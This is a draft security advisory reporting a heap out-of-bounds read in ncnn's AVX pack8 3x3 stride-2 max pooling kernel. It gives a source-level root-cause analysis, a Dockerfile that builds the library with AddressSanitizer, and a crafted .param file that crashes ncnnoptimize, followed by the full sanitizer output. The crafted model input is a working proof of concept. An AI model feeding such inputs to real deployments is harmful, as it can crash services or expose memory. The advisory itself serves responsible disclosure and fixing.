All advisories
Draft

Heap Out-of-Bounds Read in AVX Pooling

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Heap Out-of-Bounds Read in AVX Pooling

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/pooling_3x3_pack8.h:159 in pooling3x3s2_max_pack8_avx
Sanitizer verdict: heap-buffer-overflow

Summary

A crafted ncnn .param file that pairs a 2x2x8 Input with a 3x3 stride-2 max Pooling layer in valid pad mode makes ncnnoptimize run the AVX pack8 pooling kernel over a window that is larger than the tensor itself. The kernel reads three rows of three pack8 columns unconditionally, running off the end of the 196-byte input allocation and aborting the process. The entry point is ncnnoptimize <param> <bin> <outparam> <outbin> <flag>, which performs a real forward pass in ModelWriter::shape_inference().

Detail

Pooling::load_param() takes kernel_w/kernel_h (ids 1/11), stride_w/stride_h (ids 2/12) and pad_mode (id 5) from the parameter file. With pad_mode == 1 (valid) make_padding() leaves the tensor untouched, so Pooling_x86::forward computes the output extent from the raw 2x2 input. Integer division in C++ truncates toward zero, so a kernel that is strictly larger than the input still yields a non-empty output instead of an empty one.

// src/layer/x86/pooling_x86.cpp:153
        int outw = (w - kernel_w) / stride_w + 1;
        int outh = (h - kernel_h) / stride_h + 1;

// src/layer/x86/pooling_x86.cpp:421
            if (kernel_w == 3 && kernel_h == 3 && stride_w == 2 && stride_h == 2)
            {
                pooling3x3s2_max_pack8_avx(bottom_blob_bordered, top_blob, opt);

// src/layer/x86/pooling_3x3_pack8.h:149
            for (; j < outw; j++)
            {
                __m256 _r00 = _mm256_loadu_ps(r0);
                __m256 _r01 = _mm256_loadu_ps(r0 + 8);
                __m256 _r02 = _mm256_loadu_ps(r0 + 16);
                __m256 _r10 = _mm256_loadu_ps(r1);
                __m256 _r11 = _mm256_loadu_ps(r1 + 8);
                __m256 _r12 = _mm256_loadu_ps(r1 + 16);
                __m256 _r20 = _mm256_loadu_ps(r2);
                __m256 _r21 = _mm256_loadu_ps(r2 + 8);
                __m256 _r22 = _mm256_loadu_ps(r2 + 16);

For the PoC values w = h = 2, kernel_w = kernel_h = 3, stride_w = stride_h = 2: (2 - 3) / 2 + 1 is 0 + 1 = 1, so outw = outh = 1 and the specialised 3x3s2 pack8 kernel is dispatched even though a 3x3 window does not fit. The 8-channel input is repacked to elempack = 8, giving a single pack8 channel of 2x2x8 floats — 128 payload bytes, which fastMalloc rounds to the 196-byte region ASan names.

pooling3x3s2_max_pack8_avx unconditionally sets up r0, r1 and r2 as rows 0, 1 and 2 of a tensor that only has two rows, and then reads three pack8 columns from each. r2 alone starts at byte 128, and the _mm256_loadu_ps(r2 + 16) at line 159 loads 32 bytes from byte 192 of the 196-byte block. No bound relates outw/outh or the kernel footprint to the actual w/h of the padded tensor.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-out-of-bounds-read-in-avx-pooling && cd ncnn-poc-heap-out-of-bounds-read-in-avx-pooling

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'EOF'
7767517
2 2
Input input 0 1 data 0=2 1=2 2=8
Pooling pool 1 1 data out 1=3 2=2 5=1
EOF

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x512000000400 at pc 0x5c45816ae1c4 bp 0x7ffea58703d0 sp 0x7ffea58703c0
READ of size 32 at 0x512000000400 thread T0
    #0 0x5c45816ae1c3 in _mm256_loadu_ps(float const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/avxintrin.h:905
    #1 0x5c45816ae1c3 in pooling3x3s2_max_pack8_avx /ncnn/src/layer/x86/pooling_3x3_pack8.h:159
    #2 0x5c45816e7cfb in ncnn::Pooling_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/pooling_x86_avx512.cpp:423
    #3 0x5c457df78f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
    #4 0x5c457df6ab7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #5 0x5c457dfca9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #6 0x5c457de5c3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #7 0x5c457ded9eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #8 0x7af72d3cf1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x7af72d3cf28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #10 0x5c457de59624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x512000000404 is located 0 bytes after 196-byte region [0x512000000340,0x512000000404)
allocated by thread T0 here:
    #0 0x7af72da48f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x5c457deee68e in fastMalloc /ncnn/src/allocator.h:62
    #2 0x5c457deee68e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
    #3 0x5c457df2e3a6 in ncnn::Mat::create(int, int, int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:581
    #4 0x5c457df31dff in ncnn::Mat::create(int, int, int, unsigned long, int, int, ncnn::Allocator*) /ncnn/src/mat.cpp:759
    #5 0x5c4583b0dfbe in ncnn::Packing_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/packing_x86_avx512.cpp:794
    #6 0x5c457df00da8 in ncnn::Layer_final::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/src/layer.cpp:366
    #7 0x5c457df428b9 in ncnn::convert_packing(ncnn::Mat const&, ncnn::Mat&, int, ncnn::Option const&) /ncnn/src/mat.cpp:2287
    #8 0x5c457df6cc19 in ncnn::NetPrivate::convert_layout(ncnn::Mat&, ncnn::Layer const*, ncnn::Option const&) const /ncnn/src/net.cpp:524
    #9 0x5c457df72645 in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:650
    #10 0x5c457df6ab7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #11 0x5c457dfca9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #12 0x5c457de5c3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #13 0x5c457ded9eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #14 0x7af72d3cf1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #15 0x7af72d3cf28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #16 0x5c457de59624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/13/include/avxintrin.h:905 in _mm256_loadu_ps(float const*)

Credit

Zheng Yu @ DepthFirst